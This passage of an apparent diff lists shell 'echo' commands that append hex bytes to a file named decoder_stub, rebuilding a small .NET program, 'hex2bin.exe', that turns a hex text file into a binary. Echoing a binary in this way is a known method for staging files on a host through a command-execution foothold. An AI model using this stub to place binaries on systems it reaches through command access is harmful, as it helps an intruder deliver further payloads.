-echo e 26c 48 >>decoder_stub
-echo e 278 2e 74 65 78 74 >>decoder_stub
-echo e 280 c4 08 >>decoder_stub
-echo e 285 20 >>decoder_stub
-echo e 289 0a >>decoder_stub
-echo e 28d 02 >>decoder_stub
-echo e 29c 20 >>decoder_stub
-echo e 29f 60 2e 72 73 72 63 >>decoder_stub
-echo e 2a8 30 05 >>decoder_stub
-echo e 2ad 40 >>decoder_stub
-echo e 2b1 06 >>decoder_stub
-echo e 2b5 0c >>decoder_stub
-echo e 2c4 40 >>decoder_stub
-echo e 2c7 40 2e 72 65 6c 6f 63 >>decoder_stub
-echo e 2d0 0c >>decoder_stub
-echo e 2d5 60 >>decoder_stub
-echo e 2d9 02 >>decoder_stub
-echo e 2dd 12 >>decoder_stub
-echo e 2ec 40 >>decoder_stub
-echo e 2ef 42 >>decoder_stub
-echo e 300 a0 28 >>decoder_stub
-echo e 308 48 >>decoder_stub
-echo e 30c 02 >>decoder_stub
-echo e 30e 05 >>decoder_stub
-echo e 310 24 21 >>decoder_stub
-echo e 314 d8 06 >>decoder_stub
-echo e 318 01 >>decoder_stub
-echo e 31c 01 >>decoder_stub
-echo e 31f 06 >>decoder_stub
-echo e 350 13 30 04 >>decoder_stub
-echo e 354 be >>decoder_stub
-echo e 358 01 >>decoder_stub
-echo e 35b 11 >>decoder_stub
-echo e 35d 02 8e 69 17 fe 01 13 06 11 06 2d 12 >>decoder_stub
-echo e 36a 72 01 >>decoder_stub
-echo e 36e 70 28 10 >>decoder_stub
-echo e 373 0a >>decoder_stub
-echo e 376 38 9e >>decoder_stub
-echo e 37c 02 16 9a 28 11 >>decoder_stub
-echo e 383 0a 72 4b >>decoder_stub
-echo e 388 70 72 4f >>decoder_stub
-echo e 38d 70 6f 12 >>decoder_stub
-echo e 392 0a 72 51 >>decoder_stub
-echo e 397 70 72 4f >>decoder_stub
-echo e 39c 70 6f 12 >>decoder_stub
-echo e 3a1 0a 0a 06 6f 13 >>decoder_stub
-echo e 3a8 0a 18 5b 8d 15 >>decoder_stub
-echo e 3af 01 0b 16 0c 72 4f >>decoder_stub
-echo e 3b7 70 0d 16 13 04 2b 21 >>decoder_stub
-echo e 3bf 06 11 04 18 6f 14 >>decoder_stub
-echo e 3c7 0a 0d 07 08 09 1f 10 28 15 >>decoder_stub
-echo e 3d2 0a 9c 08 17 58 0c >>decoder_stub
-echo e 3d9 11 04 18 58 13 04 11 04 06 6f 13 >>decoder_stub
-echo e 3e6 0a fe 04 13 06 11 06 2d cf 02 16 9a 72 55 >>decoder_stub
-echo e 3f6 70 28 16 >>decoder_stub
-echo e 3fb 0a 28 17 >>decoder_stub
-echo e 400 0a 13 05 11 05 07 16 07 8e 69 6f 18 >>decoder_stub
-echo e 40e 0a >>decoder_stub
-echo e 410 11 05 6f 19 >>decoder_stub
-echo e 416 0a >>decoder_stub
-echo e 419 2a 1e 02 28 1a >>decoder_stub
-echo e 420 0a 2a >>decoder_stub
-echo e 424 42 53 4a 42 01 >>decoder_stub
-echo e 42a 01 >>decoder_stub
-echo e 430 0c >>decoder_stub
-echo e 434 76 32 2e 30 2e 35 30 37 32 37 >>decoder_stub
-echo e 442 05 >>decoder_stub
-echo e 444 6c >>decoder_stub
-echo e 448 30 02 >>decoder_stub
-echo e 44c 23 7e >>decoder_stub
-echo e 450 9c 02 >>decoder_stub
-echo e 454 d0 02 >>decoder_stub
-echo e 458 23 53 74 72 69 6e 67 73 >>decoder_stub
-echo e 464 6c 05 >>decoder_stub
-echo e 468 60 >>decoder_stub
-echo e 46c 23 55 53 >>decoder_stub
-echo e 470 cc 05 >>decoder_stub
-echo e 474 10 >>decoder_stub
-echo e 478 23 47 55 49 44 >>decoder_stub
-echo e 480 dc 05 >>decoder_stub
-echo e 484 fc >>decoder_stub
-echo e 488 23 42 6c 6f 62 >>decoder_stub
-echo e 494 02 >>decoder_stub
-echo e 497 01 47 15 02 >>decoder_stub
-echo e 49c 09 >>decoder_stub
-echo e 4a1 fa 01 33 >>decoder_stub
-echo e 4a5 16 >>decoder_stub
-echo e 4a8 01 >>decoder_stub
-echo e 4ac 18 >>decoder_stub
-echo e 4b0 02 >>decoder_stub
-echo e 4b4 02 >>decoder_stub
-echo e 4b8 01 >>decoder_stub
-echo e 4bc 1a >>decoder_stub
-echo e 4c0 0d >>decoder_stub
-echo e 4c4 01 >>decoder_stub
-echo e 4c8 01 >>decoder_stub
-echo e 4cc 01 >>decoder_stub
-echo e 4d2 0a >>decoder_stub
-echo e 4d4 01 >>decoder_stub
-echo e 4da 06 >>decoder_stub
-echo e 4dc 36 >>decoder_stub
-echo e 4de 2f >>decoder_stub
-echo e 4e0 06 >>decoder_stub
-echo e 4e2 5f >>decoder_stub
-echo e 4e4 4d >>decoder_stub
-echo e 4e6 06 >>decoder_stub
-echo e 4e8 76 >>decoder_stub
-echo e 4ea 4d >>decoder_stub
-echo e 4ec 06 >>decoder_stub
-echo e 4ee 93 >>decoder_stub
-echo e 4f0 4d >>decoder_stub
-echo e 4f2 06 >>decoder_stub
-echo e 4f4 b2 >>decoder_stub
-echo e 4f6 4d >>decoder_stub
-echo e 4f8 06 >>decoder_stub
-echo e 4fa cb >>decoder_stub
-echo e 4fc 4d >>decoder_stub
-echo e 4fe 06 >>decoder_stub
-echo e 500 e4 >>decoder_stub
-echo e 502 4d >>decoder_stub
-echo e 504 06 >>decoder_stub
-echo e 506 ff >>decoder_stub
-echo e 508 4d >>decoder_stub
-echo e 50a 06 >>decoder_stub
-echo e 50c 1a 01 4d >>decoder_stub
-echo e 510 06 >>decoder_stub
-echo e 512 52 01 33 01 06 >>decoder_stub
-echo e 518 66 01 33 01 06 >>decoder_stub
-echo e 51e 74 01 4d >>decoder_stub
-echo e 522 06 >>decoder_stub
-echo e 524 8d 01 4d >>decoder_stub
-echo e 528 06 >>decoder_stub
-echo e 52a bd 01 aa 01 3b >>decoder_stub
-echo e 530 d1 01 >>decoder_stub
-echo e 534 06 >>decoder_stub
-echo e 537 02 e0 01 06 >>decoder_stub
-echo e 53c 20 02 e0 01 06 >>decoder_stub
-echo e 542 3e 02 2f >>decoder_stub
-echo e 546 06 >>decoder_stub
-echo e 548 5a 02 50 02 06 >>decoder_stub
-echo e 54e 6b 02 2f >>decoder_stub
-echo e 552 06 >>decoder_stub
-echo e 554 85 02 2f >>decoder_stub
-echo e 558 06 >>decoder_stub
-echo e 55a 94 02 2f >>decoder_stub
-echo e 55e 06 >>decoder_stub
-echo e 560 aa 02 50 02 06 >>decoder_stub
-echo e 566 bc 02 50 02 >>decoder_stub
-echo e 56e 01 >>decoder_stub
-echo e 574 01 >>decoder_stub
-echo e 576 01 >>decoder_stub
-echo e 57a 10 >>decoder_stub
-echo e 57c 16 >>decoder_stub
-echo e 57e 1e >>decoder_stub
-echo e 580 05 >>decoder_stub
-echo e 582 01 >>decoder_stub
-echo e 584 01 >>decoder_stub
-echo e 586 50 20 >>decoder_stub
-echo e 58c 91 >>decoder_stub
-echo e 58e 3d >>decoder_stub
-echo e 590 0a >>decoder_stub
-echo e 592 01 >>decoder_stub
-echo e 594 1a 21 >>decoder_stub
-echo e 59a 86 18 42 >>decoder_stub
-echo e 59e 10 >>decoder_stub
-echo e 5a0 02 >>decoder_stub
-echo e 5a4 01 >>decoder_stub
-echo e 5a6 48 >>decoder_stub
-echo e 5a8 11 >>decoder_stub
-echo e 5aa 42 >>decoder_stub
-echo e 5ac 14 >>decoder_stub
-echo e 5ae 19 >>decoder_stub
-echo e 5b0 42 >>decoder_stub
-echo e 5b2 14 >>decoder_stub
-echo e 5b4 21 >>decoder_stub
-echo e 5b6 42 >>decoder_stub
-echo e 5b8 14 >>decoder_stub
-echo e 5ba 29 >>decoder_stub
-echo e 5bc 42 >>decoder_stub
-echo e 5be 14 >>decoder_stub
-echo e 5c0 31 >>decoder_stub
-echo e 5c2 42 >>decoder_stub
-echo e 5c4 14 >>decoder_stub
-echo e 5c6 39 >>decoder_stub
-echo e 5c8 42 >>decoder_stub
-echo e 5ca 14 >>decoder_stub
-echo e 5cc 41 >>decoder_stub
-echo e 5ce 42 >>decoder_stub
-echo e 5d0 14 >>decoder_stub
-echo e 5d2 49 >>decoder_stub
-echo e 5d4 42 >>decoder_stub
-echo e 5d6 14 >>decoder_stub
-echo e 5d8 51 >>decoder_stub
-echo e 5da 42 >>decoder_stub
-echo e 5dc 19 >>decoder_stub
-echo e 5de 59 >>decoder_stub
-echo e 5e0 42 >>decoder_stub
-echo e 5e2 14 >>decoder_stub
-echo e 5e4 61 >>decoder_stub
-echo e 5e6 42 >>decoder_stub
-echo e 5e8 14 >>decoder_stub
-echo e 5ea 69 >>decoder_stub
-echo e 5ec 42 >>decoder_stub
-echo e 5ee 14 >>decoder_stub
-echo e 5f0 71 >>decoder_stub
-echo e 5f2 42 >>decoder_stub
-echo e 5f4 1e >>decoder_stub
-echo e 5f6 81 >>decoder_stub
-echo e 5f8 42 >>decoder_stub
-echo e 5fa 24 >>decoder_stub
-echo e 5fc 89 >>decoder_stub
-echo e 5fe 42 >>decoder_stub
-echo e 600 10 >>decoder_stub
-echo e 602 91 >>decoder_stub
-echo e 604 46 02 29 >>decoder_stub
-echo e 608 99 >>decoder_stub
-echo e 60a 5f 02 2e >>decoder_stub
-echo e 60e a1 >>decoder_stub
-echo e 610 72 02 33 >>decoder_stub
-echo e 614 a1 >>decoder_stub
-echo e 616 7a 02 39 >>decoder_stub
-echo e 61a a1 >>decoder_stub
-echo e 61c 8a 02 3d >>decoder_stub
-echo e 620 b1 >>decoder_stub
-echo e 622 9c 02 43 >>decoder_stub
-echo e 626 a1 >>decoder_stub
-echo e 628 a3 02 49 >>decoder_stub
-echo e 62c 99 >>decoder_stub
-echo e 62e b5 02 4f >>decoder_stub
-echo e 632 c1 >>decoder_stub
-echo e 634 c3 02 55 >>decoder_stub
-echo e 638 c1 >>decoder_stub
-echo e 63a c9 02 10 >>decoder_stub
-echo e 63e 09 >>decoder_stub
-echo e 640 42 >>decoder_stub
-echo e 642 10 >>decoder_stub
-echo e 644 2e >>decoder_stub
-echo e 646 0b >>decoder_stub
-echo e 648 69 >>decoder_stub
-echo e 64a 2e >>decoder_stub
-echo e 64c 13 >>decoder_stub
-echo e 64e 76 >>decoder_stub
-echo e 650 2e >>decoder_stub
-echo e 652 1b >>decoder_stub
-echo e 654 76 >>decoder_stub
-echo e 656 2e >>decoder_stub
-echo e 658 23 >>decoder_stub
-echo e 65a 76 >>decoder_stub
-echo e 65c 2e >>decoder_stub
-echo e 65e 2b >>decoder_stub
-echo e 660 69 >>decoder_stub
-echo e 662 2e >>decoder_stub
-echo e 664 33 >>decoder_stub
-echo e 666 7c >>decoder_stub
-echo e 668 2e >>decoder_stub
-echo e 66a 3b >>decoder_stub
-echo e 66c 76 >>decoder_stub
-echo e 66e 2e >>decoder_stub
-echo e 670 4b >>decoder_stub
-echo e 672 76 >>decoder_stub
-echo e 674 2e >>decoder_stub
-echo e 676 53 >>decoder_stub
-echo e 678 94 >>decoder_stub
-echo e 67a 2e >>decoder_stub
-echo e 67c 63 >>decoder_stub
-echo e 67e be >>decoder_stub
-echo e 680 2e >>decoder_stub
-echo e 682 6b >>decoder_stub
-echo e 684 cb >>decoder_stub
-echo e 686 2e >>decoder_stub
-echo e 688 73 >>decoder_stub
-echo e 68a d4 >>decoder_stub
-echo e 68c 2e >>decoder_stub
-echo e 68e 7b >>decoder_stub
-echo e 690 dd >>decoder_stub
-echo e 692 5d >>decoder_stub
-echo e 694 04 80 >>decoder_stub
-echo e 698 01 >>decoder_stub
-echo e 6a6 1e >>decoder_stub
-echo e 6aa 02 >>decoder_stub
-echo e 6b6 01 >>decoder_stub
-echo e 6b8 26 >>decoder_stub
-echo e 6c1 3c 4d 6f 64 75 6c 65 3e >>decoder_stub
-echo e 6ca 68 65 78 32 62 69 6e 2e 65 78 65 >>decoder_stub
-echo e 6d6 50 72 6f 67 72 61 6d >>decoder_stub
-echo e 6de 68 65 78 32 62 69 6e >>decoder_stub
-echo e 6e6 6d 73 63 6f 72 6c 69 62 >>decoder_stub
-echo e 6ef 53 79 73 74 65 6d >>decoder_stub
-echo e 6f6 4f 62 6a 65 63 74 >>decoder_stub
-echo e 6fd 4d 61 69 6e >>decoder_stub
-echo e 702 2e 63 74 6f 72 >>decoder_stub
-echo e 708 61 72 67 73 >>decoder_stub
-echo e 70d 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e >>decoder_stub
-echo e 71f 41 73 73 65 6d 62 6c 79 54 69 74 6c 65 41 74 74 72 69 62 75 >>decoder_stub
-echo e 733 74 65 >>decoder_stub
-echo e 736 41 73 73 65 6d 62 6c 79 44 65 73 63 72 69 70 74 69 6f 6e 41 >>decoder_stub
-echo e 74a 74 74 72 69 62 75 74 65 >>decoder_stub
-echo e 753 41 73 73 65 6d 62 6c 79 43 6f 6e 66 69 67 75 72 61 74 69 6f >>decoder_stub
-echo e 767 6e 41 74 74 72 69 62 75 74 65 >>decoder_stub
-echo e 772 41 73 73 65 6d 62 6c 79 43 6f 6d 70 61 6e 79 41 74 74 72 69 >>decoder_stub
-echo e 786 62 75 74 65 >>decoder_stub
-echo e 78b 41 73 73 65 6d 62 6c 79 50 72 6f 64 75 63 74 41 74 74 72 69 >>decoder_stub
-echo e 79f 62 75 74 65 >>decoder_stub
-echo e 7a4 41 73 73 65 6d 62 6c 79 43 6f 70 79 72 69 67 68 74 41 74 74 >>decoder_stub
-echo e 7b8 72 69 62 75 74 65 >>decoder_stub
-echo e 7bf 41 73 73 65 6d 62 6c 79 54 72 61 64 65 6d 61 72 6b 41 74 74 >>decoder_stub
-echo e 7d3 72 69 62 75 74 65 >>decoder_stub
-echo e 7da 41 73 73 65 6d 62 6c 79 43 75 6c 74 75 72 65 41 74 74 72 69 >>decoder_stub
-echo e 7ee 62 75 74 65 >>decoder_stub
-echo e 7f3 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 >>decoder_stub
-echo e 807 6f 70 53 65 72 76 69 63 65 73 >>decoder_stub
-echo e 812 43 6f 6d 56 69 73 69 62 6c 65 41 74 74 72 69 62 75 74 65 >>decoder_stub
-echo e 826 47 75 69 64 41 74 74 72 69 62 75 74 65 >>decoder_stub
-echo e 834 41 73 73 65 6d 62 6c 79 56 65 72 73 69 6f 6e 41 74 74 72 69 >>decoder_stub
-echo e 848 62 75 74 65 >>decoder_stub
-echo e 84d 41 73 73 65 6d 62 6c 79 46 69 6c 65 56 65 72 73 69 6f 6e 41 >>decoder_stub
-echo e 861 74 74 72 69 62 75 74 65 >>decoder_stub
-echo e 86a 53 79 73 74 65 6d 2e 44 69 61 67 6e 6f 73 74 69 63 73 >>decoder_stub
-echo e 87d 44 65 62 75 67 67 61 62 6c 65 41 74 74 72 69 62 75 74 65 >>decoder_stub
-echo e 891 44 65 62 75 67 67 69 6e 67 4d 6f 64 65 73 >>decoder_stub
-echo e 8a0 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 43 6f 6d 70 69 >>decoder_stub
-echo e 8b4 6c 65 72 53 65 72 76 69 63 65 73 >>decoder_stub
-echo e 8c0 43 6f 6d 70 69 6c 61 74 69 6f 6e 52 65 6c 61 78 61 74 69 6f >>decoder_stub
-echo e 8d4 6e 73 41 74 74 72 69 62 75 74 65 >>decoder_stub
-echo e 8e0 52 75 6e 74 69 6d 65 43 6f 6d 70 61 74 69 62 69 6c 69 74 79 >>decoder_stub
-echo e 8f4 41 74 74 72 69 62 75 74 65 >>decoder_stub
-echo e 8fe 43 6f 6e 73 6f 6c 65 >>decoder_stub
-echo e 906 57 72 69 74 65 4c 69 6e 65 >>decoder_stub
-echo e 910 53 79 73 74 65 6d 2e 49 4f >>decoder_stub
-echo e 91a 46 69 6c 65 >>decoder_stub
-echo e 91f 52 65 61 64 41 6c 6c 54 65 78 74 >>decoder_stub
-echo e 92b 53 74 72 69 6e 67 >>decoder_stub
-echo e 932 52 65 70 6c 61 63 65 >>decoder_stub
-echo e 93a 67 65 74 5f 4c 65 6e 67 74 68 >>decoder_stub
-echo e 945 42 79 74 65 >>decoder_stub
-echo e 94a 53 75 62 73 74 72 69 6e 67 >>decoder_stub
-echo e 954 43 6f 6e 76 65 72 74 >>decoder_stub
-echo e 95c 54 6f 42 79 74 65 >>decoder_stub
-echo e 963 43 6f 6e 63 61 74 >>decoder_stub
-echo e 96a 46 69 6c 65 53 74 72 65 61 6d >>decoder_stub
-echo e 975 43 72 65 61 74 65 >>decoder_stub
-echo e 97c 53 74 72 65 61 6d >>decoder_stub
-echo e 983 57 72 69 74 65 >>decoder_stub
-echo e 989 43 6c 6f 73 65 >>decoder_stub
-echo e 991 49 55 >>decoder_stub
-echo e 994 73 >>decoder_stub
-echo e 996 61 >>decoder_stub
-echo e 998 67 >>decoder_stub
-echo e 99a 65 >>decoder_stub
-echo e 99c 3a >>decoder_stub
-echo e 99e 20 >>decoder_stub
-echo e 9a0 20 >>decoder_stub
-echo e 9a2 20 >>decoder_stub
-echo e 9a4 68 >>decoder_stub
-echo e 9a6 65 >>decoder_stub
-echo e 9a8 78 >>decoder_stub
-echo e 9aa 32 >>decoder_stub
-echo e 9ac 62 >>decoder_stub
-echo e 9ae 69 >>decoder_stub
-echo e 9b0 6e >>decoder_stub
-echo e 9b2 2e >>decoder_stub
-echo e 9b4 65 >>decoder_stub
-echo e 9b6 78 >>decoder_stub
-echo e 9b8 65 >>decoder_stub
-echo e 9ba 20 >>decoder_stub
-echo e 9bc 3c >>decoder_stub
-echo e 9be 68 >>decoder_stub
-echo e 9c0 65 >>decoder_stub
-echo e 9c2 78 >>decoder_stub
-echo e 9c4 69 >>decoder_stub
-echo e 9c6 6e >>decoder_stub
-echo e 9c8 70 >>decoder_stub
-echo e 9ca 75 >>decoder_stub
-echo e 9cc 74 >>decoder_stub
-echo e 9ce 66 >>decoder_stub
-echo e 9d0 69 >>decoder_stub
-echo e 9d2 6c >>decoder_stub
-echo e 9d4 65 >>decoder_stub
-echo e 9d6 3e >>decoder_stub
-echo e 9d8 08 >>decoder_stub
-echo e 9da 01 03 0d >>decoder_stub
-echo e 9df 01 >>decoder_stub
-echo e 9e1 03 0a >>decoder_stub
-echo e 9e5 09 2e >>decoder_stub
-echo e 9e8 65 >>decoder_stub
-echo e 9ea 78 >>decoder_stub
-echo e 9ec 65 >>decoder_stub
-echo e 9f0 06 24 bb c2 bc b7 11 40 bf c4 9c a7 d7 ed 8c f2 >>decoder_stub
-echo e a01 08 b7 7a 5c 56 19 34 e0 89 05 >>decoder_stub
-echo e a0c 01 01 1d 0e 03 20 >>decoder_stub
-echo e a13 01 04 20 01 01 0e 04 20 01 01 02 05 20 01 01 11 3d 04 20 01 >>decoder_stub
-echo e a27 01 08 04 >>decoder_stub
-echo e a2b 01 01 0e 04 >>decoder_stub
-echo e a30 01 0e 0e 05 20 02 0e 0e 0e 03 20 >>decoder_stub
-echo e a3c 08 05 20 02 0e 08 08 05 >>decoder_stub
-echo e a45 02 05 0e 08 05 >>decoder_stub
-echo e a4b 02 0e 0e 0e 05 >>decoder_stub
-echo e a51 01 12 5d 0e 07 20 03 01 1d 05 08 08 0b 07 07 0e 1d 05 08 0e >>decoder_stub
-echo e a65 08 12 5d 02 0c 01 >>decoder_stub
-echo e a6c 07 68 65 78 32 62 69 6e >>decoder_stub
-echo e a76 05 01 >>decoder_stub
-echo e a7c 17 01 >>decoder_stub
-echo e a7f 12 43 6f 70 79 72 69 67 68 74 20 c2 a9 20 20 32 30 30 38 >>decoder_stub
-echo e a94 29 01 >>decoder_stub
-echo e a97 24 66 39 39 39 62 62 62 31 2d 66 31 30 61 2d 34 39 65 38 2d >>decoder_stub
-echo e aab 38 33 35 37 2d 30 35 39 61 30 63 65 37 37 31 36 38 >>decoder_stub
-echo e abe 0c 01 >>decoder_stub
-echo e ac1 07 31 2e 30 2e 30 2e 30 >>decoder_stub
-echo e acb 08 01 >>decoder_stub
-echo e ace 07 01 >>decoder_stub
-echo e ad4 08 01 >>decoder_stub
-echo e ad7 08 >>decoder_stub
-echo e add 1e 01 >>decoder_stub
-echo e ae0 01 >>decoder_stub
-echo e ae2 54 02 16 57 72 61 70 4e 6f 6e 45 78 63 65 70 74 69 6f 6e 54 >>decoder_stub
-echo e af6 68 72 6f 77 73 01 >>decoder_stub
-echo e b00 85 18 7c 48 >>decoder_stub
-echo e b08 02 >>decoder_stub
-echo e b0c 53 >>decoder_stub
-echo e b10 18 28 >>decoder_stub
-echo e b14 18 0a >>decoder_stub
-echo e b18 52 53 44 53 e8 fc 2e 9d aa 52 59 42 a5 63 1e b1 c8 f6 59 23 >>decoder_stub
-echo e b2c 03 >>decoder_stub
-echo e b30 53 3a 5c 73 74 75 66 66 5c 70 72 6f 67 72 61 6d 6d 69 6e 67 >>decoder_stub
-echo e b44 5c 68 65 78 32 62 69 6e 5c 68 65 78 32 62 69 6e 5c 6f 62 6a >>decoder_stub
-echo e b58 5c 44 65 62 75 67 5c 68 65 78 32 62 69 6e 2e 70 64 62 >>decoder_stub
-echo e b6c 94 28 >>decoder_stub
-echo e b78 ae 28 >>decoder_stub
-echo e b7d 20 >>decoder_stub
-echo e b94 a0 28 >>decoder_stub
-echo e ba2 5f 43 6f 72 45 78 65 4d 61 69 6e >>decoder_stub
-echo e bae 6d 73 63 6f 72 65 65 2e 64 6c 6c >>decoder_stub
-echo e bbe ff 25 >>decoder_stub
-echo e bc1 20 40 >>decoder_stub
-echo e d0e 02 >>decoder_stub
-echo e d10 10 >>decoder_stub
-echo e d14 20 >>decoder_stub
-echo e d17 80 18 >>decoder_stub
-echo e d1c 38 >>decoder_stub
-echo e d1f 80 >>decoder_stub
-echo e d2e 01 >>decoder_stub
-echo e d30 01 >>decoder_stub
-echo e d34 50 >>decoder_stub
-echo e d37 80 >>decoder_stub
-echo e d46 01 >>decoder_stub
-echo e d48 01 >>decoder_stub
-echo e d4c 68 >>decoder_stub
-echo e d4f 80 >>decoder_stub
-echo e d5e 01 >>decoder_stub
-echo e d64 80 >>decoder_stub
-echo e d76 01 >>decoder_stub
-echo e d7c 90 >>decoder_stub
-echo e d80 a0 40 >>decoder_stub
-echo e d84 a0 02 >>decoder_stub
-echo e d90 40 43 >>decoder_stub
-echo e d94 ea 01 >>decoder_stub
-echo e da0 a0 02 34 >>decoder_stub
-echo e da6 56 >>decoder_stub
-echo e da8 53 >>decoder_stub
-echo e daa 5f >>decoder_stub
-echo e dac 56 >>decoder_stub
-echo e dae 45 >>decoder_stub
-echo e db0 52 >>decoder_stub
-echo e db2 53 >>decoder_stub
-echo e db4 49 >>decoder_stub
-echo e db6 4f >>decoder_stub
-echo e db8 4e >>decoder_stub
-echo e dba 5f >>decoder_stub
-echo e dbc 49 >>decoder_stub
-echo e dbe 4e >>decoder_stub
-echo e dc0 46 >>decoder_stub
-echo e dc2 4f >>decoder_stub
-echo e dc8 bd 04 ef fe >>decoder_stub
-echo e dce 01 >>decoder_stub
-echo e dd2 01 >>decoder_stub
-echo e dda 01 >>decoder_stub
-echo e de0 3f >>decoder_stub
-echo e de8 04 >>decoder_stub
-echo e dec 01 >>decoder_stub
-echo e dfc 44 >>decoder_stub
-echo e e00 01 >>decoder_stub
-echo e e02 56 >>decoder_stub
-echo e e04 61 >>decoder_stub
-echo e e06 72 >>decoder_stub
-echo e e08 46 >>decoder_stub
-echo e e0a 69 >>decoder_stub
-echo e e0c 6c >>decoder_stub
-echo e e0e 65 >>decoder_stub
-echo e e10 49 >>decoder_stub
-echo e e12 6e >>decoder_stub
-echo e e14 66 >>decoder_stub
-echo e e16 6f >>decoder_stub
-echo e e1c 24 >>decoder_stub
-echo e e1e 04 >>decoder_stub
-echo e e22 54 >>decoder_stub
-echo e e24 72 >>decoder_stub
-echo e e26 61 >>decoder_stub
-echo e e28 6e >>decoder_stub
-echo e e2a 73 >>decoder_stub
-echo e e2c 6c >>decoder_stub
-echo e e2e 61 >>decoder_stub
-echo e e30 74 >>decoder_stub
-echo e e32 69 >>decoder_stub
-echo e e34 6f >>decoder_stub
-echo e e36 6e >>decoder_stub
-echo e e3e b0 04 >>decoder_stub
-echo e e41 02 >>decoder_stub
-echo e e44 01 >>decoder_stub
-echo e e46 53 >>decoder_stub
-echo e e48 74 >>decoder_stub
-echo e e4a 72 >>decoder_stub
-echo e e4c 69 >>decoder_stub
-echo e e4e 6e >>decoder_stub
-echo e e50 67 >>decoder_stub
-echo e e52 46 >>decoder_stub
-echo e e54 69 >>decoder_stub
-echo e e56 6c >>decoder_stub
-echo e e58 65 >>decoder_stub
-echo e e5a 49 >>decoder_stub
-echo e e5c 6e >>decoder_stub
-echo e e5e 66 >>decoder_stub
-echo e e60 6f >>decoder_stub
-echo e e64 dc 01 >>decoder_stub
-echo e e68 01 >>decoder_stub
-echo e e6a 30 >>decoder_stub
-echo e e6c 30 >>decoder_stub
-echo e e6e 30 >>decoder_stub
-echo e e70 30 >>decoder_stub
-echo e e72 30 >>decoder_stub
-echo e e74 34 >>decoder_stub
-echo e e76 62 >>decoder_stub
-echo e e78 30 >>decoder_stub
-echo e e7c 38 >>decoder_stub
-echo e e7e 08 >>decoder_stub
-echo e e80 01 >>decoder_stub
-echo e e82 46 >>decoder_stub
-echo e e84 69 >>decoder_stub
-echo e e86 6c >>decoder_stub
-echo e e88 65 >>decoder_stub
-echo e e8a 44 >>decoder_stub
-echo e e8c 65 >>decoder_stub
-echo e e8e 73 >>decoder_stub
-echo e e90 63 >>decoder_stub
-echo e e92 72 >>decoder_stub
-echo e e94 69 >>decoder_stub
-echo e e96 70 >>decoder_stub
-echo e e98 74 >>decoder_stub
-echo e e9a 69 >>decoder_stub
-echo e e9c 6f >>decoder_stub
-echo e e9e 6e >>decoder_stub
-echo e ea4 68 >>decoder_stub
-echo e ea6 65 >>decoder_stub
-echo e ea8 78 >>decoder_stub
-echo e eaa 32 >>decoder_stub
-echo e eac 62 >>decoder_stub
-echo e eae 69 >>decoder_stub
-echo e eb0 6e >>decoder_stub
-echo e eb4 30 >>decoder_stub
-echo e eb6 08 >>decoder_stub
-echo e eb8 01 >>decoder_stub
-echo e eba 46 >>decoder_stub
-echo e ebc 69 >>decoder_stub
-echo e ebe 6c >>decoder_stub
-echo e ec0 65 >>decoder_stub
-echo e ec2 56 >>decoder_stub
-echo e ec4 65 >>decoder_stub
-echo e ec6 72 >>decoder_stub
-echo e ec8 73 >>decoder_stub
-echo e eca 69 >>decoder_stub
-echo e ecc 6f >>decoder_stub
-echo e ece 6e >>decoder_stub
-echo e ed4 31 >>decoder_stub
-echo e ed6 2e >>decoder_stub
-echo e ed8 30 >>decoder_stub
-echo e eda 2e >>decoder_stub
-echo e edc 30 >>decoder_stub
-echo e ede 2e >>decoder_stub
-echo e ee0 30 >>decoder_stub
-echo e ee4 38 >>decoder_stub
-echo e ee6 0c >>decoder_stub
-echo e ee8 01 >>decoder_stub
-echo e eea 49 >>decoder_stub
-echo e eec 6e >>decoder_stub
-echo e eee 74 >>decoder_stub
-echo e ef0 65 >>decoder_stub
-echo e ef2 72 >>decoder_stub
-echo e ef4 6e >>decoder_stub
-echo e ef6 61 >>decoder_stub
-echo e ef8 6c >>decoder_stub
-echo e efa 4e >>decoder_stub
-echo e efc 61 >>decoder_stub
-echo e efe 6d >>decoder_stub
-echo e f00 65 >>decoder_stub
-echo e f04 68 >>decoder_stub
-echo e f06 65 >>decoder_stub
-echo e f08 78 >>decoder_stub
-echo e f0a 32 >>decoder_stub
-echo e f0c 62 >>decoder_stub
-echo e f0e 69 >>decoder_stub
-echo e f10 6e >>decoder_stub
-echo e f12 2e >>decoder_stub
-echo e f14 65 >>decoder_stub
-echo e f16 78 >>decoder_stub
-echo e f18 65 >>decoder_stub
-echo e f1c 48 >>decoder_stub
-echo e f1e 12 >>decoder_stub
-echo e f20 01 >>decoder_stub
-echo e f22 4c >>decoder_stub
-echo e f24 65 >>decoder_stub
-echo e f26 67 >>decoder_stub
-echo e f28 61 >>decoder_stub
-echo e f2a 6c >>decoder_stub
-echo e f2c 43 >>decoder_stub
-echo e f2e 6f >>decoder_stub
-echo e f30 70 >>decoder_stub
-echo e f32 79 >>decoder_stub
-echo e f34 72 >>decoder_stub
-echo e f36 69 >>decoder_stub
-echo e f38 67 >>decoder_stub
-echo e f3a 68 >>decoder_stub
-echo e f3c 74 >>decoder_stub
-echo e f40 43 >>decoder_stub
-echo e f42 6f >>decoder_stub
-echo e f44 70 >>decoder_stub
-echo e f46 79 >>decoder_stub
-echo e f48 72 >>decoder_stub
-echo e f4a 69 >>decoder_stub
-echo e f4c 67 >>decoder_stub
-echo e f4e 68 >>decoder_stub
-echo e f50 74 >>decoder_stub
-echo e f52 20 >>decoder_stub
-echo e f54 a9 >>decoder_stub
-echo e f56 20 >>decoder_stub
-echo e f58 20 >>decoder_stub
-echo e f5a 32 >>decoder_stub
-echo e f5c 30 >>decoder_stub
-echo e f5e 30 >>decoder_stub
-echo e f60 38 >>decoder_stub
-echo e f64 40 >>decoder_stub
-echo e f66 0c >>decoder_stub
-echo e f68 01 >>decoder_stub
-echo e f6a 4f >>decoder_stub
-echo e f6c 72 >>decoder_stub
-echo e f6e 69 >>decoder_stub
-echo e f70 67 >>decoder_stub
-echo e f72 69 >>decoder_stub
-echo e f74 6e >>decoder_stub
-echo e f76 61 >>decoder_stub
-echo e f78 6c >>decoder_stub
-echo e f7a 46 >>decoder_stub
-echo e f7c 69 >>decoder_stub
-echo e f7e 6c >>decoder_stub
-echo e f80 65 >>decoder_stub
-echo e f82 6e >>decoder_stub
-echo e f84 61 >>decoder_stub
-echo e f86 6d >>decoder_stub
-echo e f88 65 >>decoder_stub
-echo e f8c 68 >>decoder_stub
